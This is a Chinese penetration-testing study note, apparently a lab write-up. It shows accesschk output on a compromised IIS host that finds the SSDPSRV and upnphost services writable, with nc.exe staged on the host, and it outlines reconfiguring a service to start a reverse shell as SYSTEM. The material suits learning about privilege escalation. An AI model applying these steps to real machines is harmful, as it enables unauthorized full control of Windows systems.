渗透测试学习笔记之案例三.pdfVIP

C:\Inetpubaccesschk_xp.exe /accepteula ‐uwcqv IWAM_BOB *  ack.txt  accesschk_xp.exe /accepteula ‐uwcqv IWAM_BOB *  ack.txt    C:\Inetpubdir  dir   Volume in drive C has no label.   Volume Serial Number is 50C3‐3741     Directory of C:\Inetpub    08/22/2017  07:16 PM    DIR           .  08/22/2017  07:16 PM    DIR           ..  08/22/2017  07:15 PM           380,608 accesschk_xp.exe  08/22/2017  07:16 PM                67 ack.txt  01/17/2007  07:42 PM    DIR          AdminScripts  01/17/2007  07:43 PM    DIR          ftproot  01/17/2007  07:43 PM    DIR          iissamples  08/22/2017  07:15 PM            59,392 nc.exe  01/17/2007  07:43 PM    DIR          Scripts  08/22/2017  07:13 PM    DIR          wwwroot                 3 File(s)        440,067 bytes                 7 Dir(s)   1,670,123,520 bytes free    C:\Inetpubtype ack.txt  type ack.txt  RW SSDPSRV    SERVICE_ALL_ACCESS  RW upnphost    SERVICE_ALL_ACCESS 显然，我们找到了2个满足条件的windows服务，分别是SSDPSRV和upnphost 。任意选择一个服务检查一下， 如：SSDPSRV C:\Inetpubaccesschk_xp.exe /accepteula ‐ucqv SSDPSRV  accesschk_xp.exe /accepteula ‐ucqv SSDPSRV  SSDPSRV    RW NT AUTHORITY\SYSTEM    SERVICE_ALL_ACCESS    RW BUILTIN\Administrators    SERVICE_ALL_ACCESS    RW NT AUTHORITY\Authenticated Users    SERVICE_ALL_ACCESS    RW BUILTIN\Power Users    SERVICE_ALL_ACCESS    RW NT AUTHORITY\LOCAL SERVICE    SERVICE_ALL_ACCESS 简单分析一下这个服务，我们可以发现这个服务可以使用NT A UT HORITY\SYST EM权限来启动我们指定的二进制文 件，也就是说我们可以以SYST EM权限来反弹一个shell继而完成提权操作，具体操作命令如下： 1. nmap进行端口探测 2. 分析漏洞服务并利用 3. 获取meterpreter shell并检查不安全的windows服务 4. 配置windows服务以SYST EM权限来执行反弹shell 5. 开启windows服务获取SYST EM权限的shell 文章来源 http://avfisher.win/archives/766